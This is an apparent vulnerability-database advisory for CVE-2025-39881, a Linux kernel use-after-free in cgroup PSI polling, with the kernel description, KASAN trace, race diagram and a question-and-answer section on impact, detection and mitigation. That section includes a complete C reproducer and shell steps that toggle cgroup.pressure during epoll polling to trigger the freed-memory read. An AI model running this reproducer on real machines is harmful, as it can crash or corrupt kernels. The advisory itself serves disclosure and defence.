CVE-2025-39881
BaseFortify

Publication date: 2025-09-23

Last updated on: 2025-11-03

Assigner: kernel.org

Description
In the Linux kernel, the following vulnerability has been resolved:

kernfs: Fix UAF in polling when open file is released

A use-after-free (UAF) vulnerability was identified in the PSI (Pressure Stall Information) monitoring mechanism:

BUG: KASAN: slab-use-after-free in psi_trigger_poll+0x3c/0x140
Read of size 8 at addr ffff3de3d50bd308 by task systemd/1
 psi_trigger_poll+0x3c/0x140
 cgroup_pressure_poll+0x70/0xa0
 cgroup_file_poll+0x8c/0x100
 kernfs_fop_poll+0x11c/0x1c0
 ep_item_poll.isra.0+0x188/0x2c0

Allocated by task 1:
 cgroup_file_open+0x88/0x388
 kernfs_fop_open+0x73c/0xaf0
 do_dentry_open+0x5fc/0x1200
 vfs_open+0xa0/0x3f0
 do_open+0x7e8/0xd08
 path_openat+0x2fc/0x6b0
 do_filp_open+0x174/0x368

Freed by task 8462:
 cgroup_file_release+0x130/0x1f8
 kernfs_drain_open_files+0x17c/0x440
 kernfs_drain+0x2dc/0x360
 kernfs_show+0x1b8/0x288
 cgroup_file_show+0x150/0x268
 cgroup_pressure_write+0x1dc/0x340
 cgroup_file_write+0x274/0x548

Reproduction Steps:
1. Open test/cpu.pressure and establish epoll monitoring
2. Disable monitoring: echo 0 > test/cgroup.pressure
3. Re-enable monitoring: echo 1 > test/cgroup.pressure

The race condition occurs because:
1. When cgroup.pressure is disabled (echo 0 > cgroup.pressure), it:
   - Releases PSI triggers via cgroup_file_release()
   - Frees of->priv through kernfs_drain_open_files()
2. While epoll still holds reference to the file and continues polling
3. Re-enabling (echo 1 > cgroup.pressure) accesses freed of->priv

epolling                          disable/enable cgroup.pressure
fd=open(cpu.pressure)
while(1)
...
epoll_wait
kernfs_fop_poll
kernfs_get_active = true          echo 0 > cgroup.pressure
...                               cgroup_file_show
                                  kernfs_show
                                  // inactive kn
                                  kernfs_drain_open_files
                                  cft->release(of);
                                  kfree(ctx);
                                  ...
kernfs_get_active = false
                                  echo 1 > cgroup.pressure
                                  kernfs_show
                                  kernfs_activate_one(kn);
kernfs_fop_poll
kernfs_get_active = true
cgroup_file_poll
psi_trigger_poll
// UAF
...
end: close(fd)

To address this issue, introduce kernfs_get_active_of() for kernfs open files to obtain active references. This function will fail if the open file has been released. Replace kernfs_get_active() with kernfs_get_active_of() to prevent further operations on released file descriptors.
Meta Information
Published: 2025-09-23
Last Modified: 2025-11-03
Generated: 2026-05-06
AI Q&A: 2025-09-23
EPSS Evaluated: 2026-05-05
Affected Vendors & Products (1 associated CPE)
Vendor: linux
Product: linux_kernel
Version / Range: 6.1.153-1
Exploitability
CWE: CWE-UNKNOWN (no CWE assigned on this page)
KEV: not listed on this page
AI Powered Q&A
Can you explain this vulnerability to me?

This is a use-after-free (UAF) in the Linux kernel's PSI (Pressure Stall Information) monitoring path for cgroups. A process opens a cgroup's cpu.pressure file and waits on it with epoll. Writing 0 to that cgroup's cgroup.pressure file disables PSI accounting, which marks the kernfs node inactive and drains its open files: cgroup_file_release() releases the PSI trigger and the per-open context stored in of->priv is freed. epoll still holds a reference to the open file, so once cgroup.pressure is written back to 1 and the node is activated again, the next poll runs kernfs_fop_poll -> cgroup_file_poll -> psi_trigger_poll on the freed context. KASAN reports this as an 8-byte read from freed slab memory; without KASAN it is silent memory corruption or a crash. The fix adds kernfs_get_active_of(), which refuses to hand out an active reference for an open file that has already been released, and uses it in place of kernfs_get_active() so the poll fails cleanly instead of touching freed memory.


How can this vulnerability impact me?

The practical impact is kernel memory corruption on the affected host: a read through a freed of->priv pointer, which can crash the kernel (denial of service) or, as with any kernel use-after-free, leave freed memory in a state an attacker may try to build on for privilege escalation. This page shows only the KASAN-reported read, not a working exploit. Triggering it requires local access to a cgroup v2 hierarchy where the caller can open a cgroup's cpu.pressure file and write to its cgroup.pressure file; that is root by default, but also any user to whom that cgroup has been delegated. Systems that toggle cgroup.pressure while PSI monitors are active can hit it in normal operation (the report on this page was produced with systemd, PID 1, as the polling task).


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This is a local kernel bug with no network-visible signature, so detection is a kernel version check plus, if you want proof, a reproduction on a disposable test machine. Version check: compare the output of uname -r against the kernel that carries the fix for your distribution (this page associates the CPE linux_kernel 6.1.153-1 with the CVE; the cgroup.pressure knob exists only on cgroup v2 with kernel 6.1 or later, so kernels without that file are not exposed). Reproduction, as root on a KASAN-enabled test kernel, following the Description: 1) mkdir /sys/fs/cgroup/test, open /sys/fs/cgroup/test/cpu.pressure, write a PSI trigger to it (for example "some 150000 1000000") and wait on the descriptor with epoll. 2) Disable monitoring: echo 0 > /sys/fs/cgroup/test/cgroup.pressure. 3) Re-enable monitoring: echo 1 > /sys/fs/cgroup/test/cgroup.pressure. 4) Let the poller poll the descriptor again and check the kernel log: dmesg | grep -A 8 'slab-use-after-free in psi_trigger_poll'. A hit confirms the unfixed kernfs polling path. Note that the toggle is written to the cgroup's cgroup.pressure file, not to cpu.pressure.
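The steps above (and the Reproduction Steps in the Description) written out as one program. This is an added example, not code from the kernel patch or from BaseFortify. Everything it relies on is an assumption: cgroup v2 mounted at /sys/fs/cgroup, a child cgroup created with mkdir /sys/fs/cgroup/test, root privileges, a dmesg binary on PATH, and a disposable KASAN-enabled test VM (on an unfixed kernel without KASAN the poll reads freed memory silently or crashes the machine). The PSI trigger syntax and limits encoded in psi_trigger_spec() are the documented kernel interface; the rest is the reproduction sequence from this page.

```c
/*
 * Added example reproducer for the cgroup.pressure / cpu.pressure UAF.
 * Not from the kernel patch or from BaseFortify. Assumes (all assumptions):
 * cgroup v2 at /sys/fs/cgroup, a "test" child cgroup, root, a KASAN kernel
 * in a throwaway VM, and dmesg available for the final log check.
 */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/epoll.h>
#include <unistd.h>

#define CG_DIR "/sys/fs/cgroup/test"   /* assumed test cgroup path */

/*
 * Format a PSI trigger line in the kernel's "<some|full> <stall_us> <window_us>"
 * syntax, enforcing the limits the kernel applies when the line is written to
 * a pressure file: window between 500 ms and 10 s, and 0 < stall <= window.
 * Returns 0 on success or -EINVAL.
 */
int psi_trigger_spec(char *out, size_t outsz, const char *kind,
                     unsigned stall_us, unsigned window_us)
{
    if (strcmp(kind, "some") != 0 && strcmp(kind, "full") != 0)
        return -EINVAL;
    if (window_us < 500000u || window_us > 10000000u)
        return -EINVAL;
    if (stall_us == 0 || stall_us > window_us)
        return -EINVAL;
    int n = snprintf(out, outsz, "%s %u %u", kind, stall_us, window_us);
    return (n < 0 || (size_t)n >= outsz) ? -EINVAL : 0;
}

/* Return 1 if a dmesg-style line or buffer carries the KASAN signature from this CVE. */
int kasan_psi_uaf_reported(const char *log)
{
    return strstr(log, "KASAN: slab-use-after-free in psi_trigger_poll") != NULL;
}

/* Equivalent of: echo 0|1 > test/cgroup.pressure */
static int set_cgroup_pressure(int enable)
{
    int fd = open(CG_DIR "/cgroup.pressure", O_WRONLY);
    if (fd < 0)
        return -errno;
    ssize_t w = write(fd, enable ? "1" : "0", 1);
    close(fd);
    return w == 1 ? 0 : -EIO;
}

int main(void)
{
    char spec[64], line[512];
    struct epoll_event ev, out;
    int fd, ep, i, hit = 0;
    FILE *kmsg;

    if (psi_trigger_spec(spec, sizeof spec, "some", 150000, 1000000) != 0)
        return 1;

    /* Step 1: open cpu.pressure, register the trigger, arm epoll on the fd. */
    fd = open(CG_DIR "/cpu.pressure", O_RDWR | O_NONBLOCK);
    if (fd < 0 || write(fd, spec, strlen(spec)) < 0) {
        perror("cpu.pressure");
        return 1;
    }
    ep = epoll_create1(0);
    ev.events = EPOLLPRI;
    ev.data.fd = fd;
    if (ep < 0 || epoll_ctl(ep, EPOLL_CTL_ADD, fd, &ev) < 0) {
        perror("epoll");
        return 1;
    }

    /*
     * Steps 2 and 3: disable (drains the open file, frees of->priv) and
     * re-enable. EPOLL_CTL_MOD forces an immediate re-poll of the fd, which
     * is the kernfs_fop_poll -> psi_trigger_poll path that reads freed memory.
     */
    for (i = 0; i < 10; i++) {
        if (set_cgroup_pressure(0) < 0 || set_cgroup_pressure(1) < 0) {
            perror("cgroup.pressure");
            break;
        }
        epoll_ctl(ep, EPOLL_CTL_MOD, fd, &ev);
        epoll_wait(ep, &out, 1, 10);
    }

    /* Step 4: look for the KASAN report in the kernel log. */
    kmsg = popen("dmesg", "r");
    if (kmsg) {
        while (fgets(line, sizeof line, kmsg))
            hit |= kasan_psi_uaf_reported(line);
        pclose(kmsg);
    }
    printf("KASAN psi_trigger_poll UAF reported: %s\n", hit ? "yes" : "no");
    close(ep);
    close(fd);
    return 0;
}
```

Build with gcc -Wall -O2 repro.c -o repro and run it as root inside the throwaway VM only. psi_trigger_spec() and kasan_psi_uaf_reported() are the only parts that run without privileges; the rest performs the actual disable/enable/poll sequence and, on an unfixed KASAN kernel, should end with "reported: yes".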


What immediate steps should I take to mitigate this vulnerability?

Update to a kernel that carries the fix, in which kernfs_get_active_of() replaces kernfs_get_active() so that file operations on a released kernfs open file fail instead of touching freed memory; follow your distribution's security updates for the exact version. Until the update is in place, avoid the triggering sequence: do not write to cgroup.pressure on a cgroup whose pressure files are open and being polled, and do not delegate write access to cgroup.pressure to untrusted users, since any local user who can open a cgroup's cpu.pressure and write its cgroup.pressure can cause the free. Leaving PSI accounting enabled (the default) and never toggling it removes the trigger entirely.

